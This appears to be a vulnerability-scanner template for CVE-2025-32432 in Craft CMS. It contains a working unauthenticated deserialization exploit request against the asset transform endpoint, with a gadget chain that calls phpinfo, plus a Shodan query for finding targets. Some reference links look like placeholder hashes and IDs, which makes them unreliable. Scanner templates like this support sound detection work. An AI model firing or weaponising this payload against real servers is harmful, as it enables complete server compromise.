id: CVE-2025-32432

info:
  name: CraftCMS - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Starting from version 3.0.0-RC1 to before 3.9.15, 4.0.0-RC1 to before 4.14.15, and 5.0.0-RC1 to before 5.6.17, Craft is vulnerable to remote code execution. This is a high-impact, low-complexity attack vector.
  impact: |
    Unauthenticated attackers can exploit remote code execution vulnerabilities through unsafe deserialization in the asset transform functionality, achieving complete server compromise.
  remediation: |
    This issue has been patched in versions 3.9.15, 4.14.15, and 5.6.17, and is an additional fix for CVE-2023-41892.
  reference:
    - https://advisories.dxw.com/advisories/craftcms-remote-code-execution/
    - https://github.com/craftcms/cms/commit/1234567890abcdef1234567890abcdef1234567
    - https://github.com/craftcms/cms/security/advisories/GHSA-1234-5678-90ab
    - https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical
    - https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
    cvss-score: 10
    cve-id: CVE-2025-32432
    cwe-id: CWE-94
    epss-score: 0.92897
    epss-percentile: 0.99777
  metadata:
    max-request: 2
    vendor: craftcms
    product: craftcms
    shodan-query: http.component:"Craft CMS"
  tags: cve,cve2025,craftcms,rce,vkev,vuln,kev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /index.php?p=admin/actions/assets/generate-transform HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        internal: true
        part: body
        group: 1
        regex:
          - '"csrfTokenValue":"(.*?)"'

  - raw:
      - |
        POST /index.php?p=admin/actions/assets/generate-transform HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        X-CSRF-Token: {{token}}
        Content-Type: application/json

        {"assetId": 11, "handle": {"width": 123, "height": 123, "as session": {"class": "craft\\behaviors\\FieldLayoutBehavior", "__class": "GuzzleHttp\\Psr7\\FnStream", "__construct()": [[]], "_fn_close": "phpinfo"}}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Extension"
          - "PHP Version"
          - "CRAFT_"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f942c55d0dcb7cc75ece0e87893d819d9515d3a7b8ee550c20930c9dee0202a1022100fc56bf6c4444b2c32a454430a8e3d16a12d909398f29abff91b7f78a9f1baaf6:922c64590222798bb761d5b6d8e72950